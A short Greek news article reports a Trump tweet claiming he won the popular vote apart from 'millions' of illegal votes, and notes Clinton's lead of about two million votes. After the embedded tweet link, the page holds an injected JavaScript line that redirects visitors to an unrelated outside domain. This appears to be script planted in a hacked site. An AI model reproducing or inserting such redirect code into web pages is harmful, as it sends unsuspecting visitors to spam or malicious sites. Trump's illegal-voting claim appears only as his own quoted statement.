Τραμπ: Κέρδισα τη λαϊκή ψήφο αν εξαιρέσουμε τα εκατ. που ψήφισαν παράνομα

0
12

 

Μέσω Twitter συνεχίζει τις επιθέσεις του στη Χίλαρι Κλίντον ο νεοεκλεγείς πρόεδρος των ΗΠΑ Ντόναλντ Τραμπ, ο οποίος απαντά για τη μεγάλη διαφορά ψήφων που είχε από την ηττημένη Δημοκρατική υποψήφια. Σηειωτέον ότι τη Χίλαρι την ψήφισαν 2 εκατ. περισσότεροι από τον Τραμπ, αν και ο δεύτερος κέρδισε περισσότερους εκλέκτορες.

Ο Τραμπ σχολίασε στο twitter του πως «κέρδισα τη λαϊκή ψήφο αν εξαιρέσεις τα εκατομμύρια των ανθρώπων που ψήφισαν παράνομα» και συμπλήρωσε: «Θα ήταν πολύ πιο εύκολο για εμένα να κερδίσω τη λαϊκή ψήφο απ’ ό,τι το Σώμα των Εκλεκτόρων, αν επισκεπτόμουν μόνο 3-4 πολιτείες απ’ ό,τι 15 που επισκέφθηκα. Θα κέρδιζα πιο εύκολα και πειστικά (αλλά οι μικρές πολιτείες τείνουν να ξεχαστούν)» λέει χαρακτηριστικά.

Η καταμέτρηση  στο Σώμα Εκλεκτόρων συνεχίζεται κι αναμένεται να ολοκληρωθεί στις 19 Δεκεμβρίου ενώ η Χίλαρι όπως φαίνεται θα έχει 2,5 εκατ. ψήφους περισσότερες από τον εκλεγέντα πρόεδρο.

https://twitter.com/realDonaldTrump/status/803033642545115140 setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here